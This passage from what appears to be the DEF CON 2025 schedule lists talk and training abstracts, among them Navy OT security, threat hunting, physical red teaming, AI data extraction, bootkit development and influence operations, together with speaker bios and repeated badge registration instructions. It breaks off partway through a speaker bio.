As the lines between IT and operational technology continue to blur, our Naval fleet faces a growing attack surface from propulsion and power to weapons and control systems. Enter MOSAICS Block 1, a Department of Defense framework for operational technology security to ensure real-time monitoring, safe active asset discovery, and behavioral threat detection tailored for mission-critical ICS. In this session, we will walk through how MOSAICS is being applied to Naval mission systems, highlighting Department of the Navy use cases. We will break down the reference architecture and offer candid insights on adapting this framework to protect legacy systems at sea without compromising lethality. This talk is for ICS defenders, red teamers, and cyber policy leaders who want a front-row view into how the Department of the Navy is operationalizing OT security at scale.

SpeakerBio:  Michael Frank

Mr. Michael Frank is currently serving as the Deputy Chief Technology Officer for the Department of the Navy, responsible for identifying and assessing emerging technology. Prior to this role, Mr. Frank was a Principal with the Boston Consulting Group, helping public and private organizations solve technology related problems. Mr. Frank is also an Officer in the Marine Reserves, currently leading the Cybersecurity portfolio for the Marine Innovation Unit. He has served as the Red Cell lead for Exercise Cyber Yankee for the last five years. Mr. Frank holds an MS in Information Security from Carnegie Mellon University, an MBA from the Darden School of Business, and a BA in Accounting from Washington and Jefferson College.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 09:00-18:59 PDT


Title: Human Registration Open
When: Saturday, Aug 9, 09:00 - 18:59 PDT
Where: LVCCWest - Map

Description:

Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.

Basics

Who needs a badge?

A badge is required for each human age 8 and older.

Human?

You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.

Lines? Linecon?

Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)

Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.

Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.

Ways to buy a badge

Online Purchase

You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked-up on-site -- they will not be mailed or shipped.

We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.

If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.

Online purchases are provided a receipt via email when the purchase is made.

Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.

Cash Purchase

Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.

There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.

We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.

Via BlackHat

If you attend BlackHat, it is possible to purchase a DEF CON badge with your BlackHat registration. If you did so, please get your DEF CON badge from BlackHat before they close.

BlackHat should send you an email with instructions for how to obtain your DEF CON badge. In case you missed it, you can go to the second floor, at the concierge desk, halfway down Black Hat Blvd.

Misc

Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.

If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(

If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.

Still need help?

If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 08:00-18:59 PDT


Title: Human Registration Open
When: Friday, Aug 8, 08:00 - 18:59 PDT
Where: LVCCWest - Map

Description:

Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.

Basics

Who needs a badge?

A badge is required for each human age 8 and older.

Human?

You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.

Lines? Linecon?

Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)

Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.

Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.

Ways to buy a badge

Online Purchase

You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked-up on-site -- they will not be mailed or shipped.

We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.

If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.

Online purchases are provided a receipt via email when the purchase is made.

Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.

Cash Purchase

Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.

There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.

We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.

Via BlackHat

If you attend BlackHat, it is possible to purchase a DEF CON badge with your BlackHat registration. If you did so, please get your DEF CON badge from BlackHat before they close.

BlackHat should send you an email with instructions for how to obtain your DEF CON badge. In case you missed it, you can go to the second floor, at the concierge desk, halfway down Black Hat Blvd.

Misc

Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.

If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(

If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.

Still need help?

If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Thursday - 08:00-18:59 PDT


Title: Human Registration Open
When: Thursday, Aug 7, 08:00 - 18:59 PDT
Where: LVCCWest - Map

Description:

Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.

Basics

Who needs a badge?

A badge is required for each human age 8 and older.

Human?

You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.

Lines? Linecon?

Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)

Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.

Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.

Ways to buy a badge

Online Purchase

You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked-up on-site -- they will not be mailed or shipped.

We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.

If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.

Online purchases are provided a receipt via email when the purchase is made.

Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.

Cash Purchase

Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.

There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.

We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.

Via BlackHat

If you attend BlackHat, it is possible to purchase a DEF CON badge with your BlackHat registration. If you did so, please get your DEF CON badge from BlackHat before they close.

BlackHat should send you an email with instructions for how to obtain your DEF CON badge. In case you missed it, you can go to the second floor, at the concierge desk, halfway down Black Hat Blvd.

Misc

Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.

If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(

If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.

Still need help?

If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Sunday - 09:00-11:59 PDT


Title: Human Registration Open
When: Sunday, Aug 10, 09:00 - 11:59 PDT
Where: LVCCWest - Map

Description:

Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.

Basics

Who needs a badge?

A badge is required for each human age 8 and older.

Human?

You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.

Lines? Linecon?

Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)

Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.

Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.

Ways to buy a badge

Online Purchase

You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked-up on-site -- they will not be mailed or shipped.

We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.

If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.

Online purchases are provided a receipt via email when the purchase is made.

Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.

Cash Purchase

Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.

There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.

We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.

Via BlackHat

If you attend BlackHat, it is possible to purchase a DEF CON badge with your BlackHat registration. If you did so, please get your DEF CON badge from BlackHat before they close.

BlackHat should send you an email with instructions for how to obtain your DEF CON badge. In case you missed it, you can go to the second floor, at the concierge desk, halfway down Black Hat Blvd.

Misc

Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.

If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(

If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.

Still need help?

If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Hunting for Hackers by Deloitte
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

The “Hunting for Hackers” course provides a baseline level of knowledge designed to train cybersecurity professionals to actively defend critical computer systems. The course exposes participants to a “Think like the Adversary” mindset to actively detect sophisticated and tailored adversary attacks. This course is designed to prepare cybersecurity professionals to Hunt within their network for evidence of adversary presence not previously detected by automated enterprise security devices and software.

Rather than simply reacting to network attacks, participants of this cyber threat hunting training learn methods to interrogate systems and analyze data proactively and remotely. This empowers participants to proactively discover systems targeted by an adversary. Participants learn how to discover malicious code, and evidence of adversary presence and lateral movement within a network. Throughout the program, instructors share their experience in cybersecurity, operations, and tool development. This provides participants an appreciation of the challenges they may face in countering the cyber adversary.

Speakers:Kyle Smathers,Bobby Thomas

SpeakerBio:  Kyle Smathers, Deloitte

Kyle Smathers is a Specialist Master at Deloitte Risk & Financial Advisory and a seasoned cybersecurity professional with a knack for problem-solving and developing capabilities. He has served as an Air Force officer and continues his service as a reservist, bringing over a decade of experience with cutting-edge cybersecurity platforms, training, and missions. His innovative contributions have gained significant recognition, earning him an invitation to contribute to the design of the Air Force's ‘Interceptor’ cyber threat hunting platform. In his free time, he is either with his family, riding his bicycle or working on a house project.

SpeakerBio:  Bobby Thomas, Deloitte

Bobby Thomas has over 20 years of experience in cyber operations, network analysis, exploitation, and incident response. He possesses a comprehensive background in cyber network operations from planning to execution, intelligence operations, management, technical training course development and revision. Bobby currently works on Deloitte’s Advanced Cyber Training Team, Cyber Assessment Team, and Threat Hunting Team. He has his master’s degree in cyber security and multiple industry leading certifications to include: CISSP, GCFA, GNFA, GCFE, CEH, and Security+. During his off time he enjoys trying new restaurants and traveling with his family.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Hunting for Hackers by Deloitte
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

The “Hunting for Hackers” course provides a baseline level of knowledge designed to train cybersecurity professionals to actively defend critical computer systems. The course exposes participants to a “Think like the Adversary” mindset to actively detect sophisticated and tailored adversary attacks. This course is designed to prepare cybersecurity professionals to Hunt within their network for evidence of adversary presence not previously detected by automated enterprise security devices and software.

Rather than simply reacting to network attacks, participants of this cyber threat hunting training learn methods to interrogate systems and analyze data proactively and remotely. This empowers participants to proactively discover systems targeted by an adversary. Participants learn how to discover malicious code, and evidence of adversary presence and lateral movement within a network. Throughout the program, instructors share their experience in cybersecurity, operations, and tool development. This provides participants an appreciation of the challenges they may face in countering the cyber adversary.

Speakers:Kyle Smathers,Bobby Thomas

SpeakerBio:  Kyle Smathers, Deloitte

Kyle Smathers is a Specialist Master at Deloitte Risk & Financial Advisory and a seasoned cybersecurity professional with a knack for problem-solving and developing capabilities. He has served as an Air Force officer and continues his service as a reservist, bringing over a decade of experience with cutting-edge cybersecurity platforms, training, and missions. His innovative contributions have gained significant recognition, earning him an invitation to contribute to the design of the Air Force's ‘Interceptor’ cyber threat hunting platform. In his free time, he is either with his family, riding his bicycle or working on a house project.

SpeakerBio:  Bobby Thomas, Deloitte

Bobby Thomas has over 20 years of experience in cyber operations, network analysis, exploitation, and incident response. He possesses a comprehensive background in cyber network operations from planning to execution, intelligence operations, management, technical training course development and revision. Bobby currently works on Deloitte’s Advanced Cyber Training Team, Cyber Assessment Team, and Threat Hunting Team. He has his master’s degree in cyber security and multiple industry leading certifications to include: CISSP, GCFA, GNFA, GCFE, CEH, and Security+. During his off time he enjoys trying new restaurants and traveling with his family.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 15:00-15:50 PDT


Title: Hybrid Attack
When: Friday, Aug 8, 15:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

This workshop will provide an in-depth, practical demonstration of how real-world Red Team operations are conducted, focusing on the physical aspect of intrusion. We will walk through the entire lifecycle of an engagement, from intelligence gathering and planning to execution and exfiltration.

Unlike operations in other regions, this case study is set in a Brazilian environment, where high crime rates, armed security, and unpredictable urban risks add a unique layer of complexity to physical Red Team engagements. Security personnel in Brazil often rely on physical force and firearms rather than solely procedural measures, making adversarial simulation far more challenging and dangerous.

This session aims to expose security professionals to the often-overlooked risks posed by hybrid attacks and demonstrate why organizations—especially in high-risk regions—must integrate physical security, cybersecurity, and situational awareness to build a comprehensive defense strategy against evolving threats.

Due to high crime rates and frequent security threats, Brazilian companies must adopt stricter policies and proactive security measures to mitigate risks. The increasing sophistication of both criminal organizations and Red Team adversaries forces companies to rethink their physical and cybersecurity defenses, imposing more restrictive controls, robust employee training, and continuous security assessments to ensure resilience against real-world hybrid threats.

Participants will gain insights into advanced Red Team techniques used to bypass security controls, leveraging real-world tactics such as social engineering, badge cloning, physical intrusion, and covert device placement, all while considering the unique security landscape of Brazil. Through a detailed case study, we will showcase how an operation successfully led to the extraction of a sensitive financial document and the installation of a rogue device—in an environment where the risk of exposure carries real-world consequences beyond mere detection.

SpeakerBio:  Jonathan Coradi

Jonathan Coradi works as a RedTeam Operator at Hakai Security and has over 7 years of experience in cybersecurity, working as an Offsec Leader in several companies in the industrial, financial and banking sectors in Brazil, focusing on penetration testing, Red Team operations, and physical operations. He also works as a BugHunter, ranking Top 1 on the Bug Bounty platform BugHunt, in addition to finding vulnerabilities in Microsoft, Uber, Mercado Livre, among others.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 12:00-12:10 PDT


Title: I Can't RE (and You Can Too!)
When: Saturday, Aug 9, 12:00 - 12:10 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Johnny Xmas
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Saturday - 11:00-11:59 PDT


Title: Illuminating the Dark Corners of AI: Extracting Private Data from AI Models and Vector Embeddings
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

This talk explores the hidden risks in apps leveraging modern AI systems—especially those using large language models (LLMs) and retrieval-augmented generation (RAG) workflows. We demonstrate how sensitive data, such as personally identifiable information (PII) and social security numbers, can be extracted through real-world attacks. We’ll demonstrate model inversion attacks targeting fine-tuned models, and embedding inversion attacks on vector databases among others. The point is to show how PII scanning tools fail to recognize the rich data that lives in these systems and how much of privacy disaster these AI ecosystems really are.

SpeakerBio:  Patrick Walsh

Patrick Walsh has an over 20 year history of running threat research and engineering teams overseeing products ranging from anti-virus and intrusion prevention to enterprise cloud software. He is a long-time advocate for privacy and security and holds multiple patents in that space. Patrick now leads IronCore Labs, an application data protection platform that uses encryption to protect data stored in the cloud while keeping it searchable and usable. Outside of work, he enjoys the outdoors, photography, hacking, lock picking, biking, swimming, and magic.


Return to Index    -    Add to Google    -    ics Calendar file

AIV - Saturday - 16:30-17:15 PDT


Title: Impact of Frontier AI on the Landscape of Cybersecurity
When: Saturday, Aug 9, 16:30 - 17:15 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

As AI advances, how will it impact the landscape of cybersecurity? Especially given that it can help both attackers and defenders, which side will AI help more? In this talk, I will talk about our recent work on Cybergym and Bountybench, evaluating AI agent capabilities in real world security challenges, where AI agents were able to autonomously discover 15 zero-days in widely distributed open source software and solve bounty tasks worth of tens of thousands of dollars. I will also discuss our work on analyzing how frontier AI will impact the landscape of cybersecurity and also our recently launched Frontier AI Cybersecurity Observatory, an open platform for the community to work together for continuous monitoring of AI capabilities in cyber security.

SpeakerBio:  Dawn Song
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 12:00-13:30 PDT


Title: Improv
When: Friday, Aug 8, 12:00 - 13:30 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Ready to think on your feet? Join Bryan and Kevin with our bite-sized improv showdown - jump in with activities that sharpen your social engineering chops (or just kick back and enjoy the laughs).


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 15:30-15:59 PDT


Title: Improv
When: Friday, Aug 8, 15:30 - 15:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Jump into our lightning improv session - 30 minutes of quick-fire skits to keep your social-engineer reflexes razor-sharp!


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 16:00-16:45 PDT


Title: Infecting the Boot to Own the Kernel: Bootkits and Rootkits Development
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Bootkits and Rootkits represent some of the most complex and stealthy forms of malware, capable of achieving full system control before and after the OS is loaded. While often discussed in theory, their actual construction, interaction, and execution flow remain mostly hidden from public view. This talk sheds light on how these implants are built and how their components interact across boot stages and kernel space.

We'll explore the internals of a fully functional UEFI Bootkit and Kernel-mode Rootkit, examining their modular design, runtime interactions, and the mechanisms used to hook critical parts of the Windows boot chain. Attendees will see how these implants operate across pre-boot and post-boot phases, including early internet connectivity from firmware, dynamic payload delivery, runtime service hooking, deep kernel control, and advanced capabilities like hiding files, processes, and network activity, blocking traffic, capturing keystrokes, and maintaining command and control directly from kernel space.

Everything shown on stage will be yours to explore: a complete Bootkit and Rootkit framework, fully customizable and ready to simulate real threats, test defenses, or build something even stealthier.

References:

Speakers:Alejandro "TheMalwareGuardian" Vazquez,Maria "drkrysSrng" San Jose

SpeakerBio:  Alejandro "TheMalwareGuardian" Vazquez

Alejandro Vázquez Vázquez is a security researcher and Red Team Operator with deep expertise in Windows Internals, malware development, and advanced threat emulation. He is one of the few professionals who has publicly presented live bootkit and rootkit development, including real-world demos and open-source examples such as Abyss and Benthic.

He has been behind some of the most hands-on offensive projects out there: crafting custom malware for Red Team ops, deploying stealthy UEFI implants for long-term persistence, developing real OT honeypots to lure attackers targeting critical infrastructure, building AI-powered frameworks that automate and scale pentest workflows, and designing platforms to hunt and profile ransomware groups.

By day, he conducts offensive security operations while also serving as an instructor in several master's degrees, teaching malware analysis, exploit development, bootkits, and rootkits to the next generation of cybersecurity professionals. By night, he writes implants that play nice with modern security mechanisms. From pre-boot to the kernel, if it runs low enough, he wants to control it. And if it's undocumented, even better.

He doesn't just give talks. He builds the tools, shares the code, and gives you the full presentation, so you can run it yourself and teach others.

SpeakerBio:  Maria "drkrysSrng" San Jose

Maria is a cybersecurity specialist working for the Guardia Civil, Spain's national military police force. She has served in some of the most specialized cyber units within the organization, including the Cyberterrorism Group and, currently, the Cybercrime Department of the Central Operative Unit (UCO), where she focuses on cybercrime investigations and threat intelligence.

Before joining the Guardia Civil, Maria built a strong foundation as a software engineer, contributing to flight simulation systems for major air navigation entities such as ENAIRE (AENA) and ROMATSA (Romania).

Outside her official duties, she is passionate about malware analysis and reverse engineering, dedicating personal time to studying advanced threats and attack techniques. Her combined experience in software development and threat investigation gives her a unique, well-rounded perspective on both offensive and defensive security.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Sunday - 08:00-16:59 PDT


Title: Influence Operations: Tactics, Defense, and Exploitation
When: Sunday, Aug 10, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This two-day training will be offered on Saturday and Sunday (August 9-10). Participants will receive a DEF CON Human Badge with their registration

It is indeed all about the information. Information is power—and those who control it hold the reins. This course dives deep into the topic of Influence Operations (IO), teaching you how adversaries manipulate, deceive, and control the flow of information to achieve their objectives. From destabilizing governments to swaying elections and ruining careers, IO is a tool used by state and non-state actors alike. The question is, how do you defend against it?

In this fast-paced, hands-on course, we’ll break down how IO is planned, executed, and defended against. You’ll gain the skills and knowledge to not only recognize and counteract these operations but to protect yourself, your organization, and even your country from their impact.

What You'll Learn:

By the end of the course, you’ll not only have a deep understanding of how IO is executed, but you'll also walk away with practical tools to defend against these attacks. You’ll learn how to recognize the signs of manipulation, understand the motivations behind IO, and develop countermeasures to protect against them.

In a world where information is weaponized, knowing how to protect yourself is no longer optional. Whether you’re securing yourself, an organization, protecting a political campaign, or defending a nation, this course is your toolkit for navigating the complex and increasingly dangerous world of influence operations.

Speakers:Tom Cross,Greg Conti

SpeakerBio:  Tom Cross

Tom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon as https://ioc.exchange/@decius.

SpeakerBio:  Greg Conti, Co-Founder and Principal at Kopidion

Greg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.

Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.

Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Saturday - 08:00-16:59 PDT


Title: Influence Operations: Tactics, Defense, and Exploitation
When: Saturday, Aug 9, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Please note: This two-day training will be offered on Saturday and Sunday (August 9-10). Participants will receive a DEF CON Human Badge with their registration

It is indeed all about the information. Information is power—and those who control it hold the reins. This course dives deep into the topic of Influence Operations (IO), teaching you how adversaries manipulate, deceive, and control the flow of information to achieve their objectives. From destabilizing governments to swaying elections and ruining careers, IO is a tool used by state and non-state actors alike. The question is, how do you defend against it?

In this fast-paced, hands-on course, we’ll break down how IO is planned, executed, and defended against. You’ll gain the skills and knowledge to not only recognize and counteract these operations but to protect yourself, your organization, and even your country from their impact.

What You'll Learn:

By the end of the course, you’ll not only have a deep understanding of how IO is executed, but you'll also walk away with practical tools to defend against these attacks. You’ll learn how to recognize the signs of manipulation, understand the motivations behind IO, and develop countermeasures to protect against them.

In a world where information is weaponized, knowing how to protect yourself is no longer optional. Whether you’re securing yourself, an organization, protecting a political campaign, or defending a nation, this course is your toolkit for navigating the complex and increasingly dangerous world of influence operations.

Speakers:Tom Cross,Greg Conti

SpeakerBio:  Tom Cross

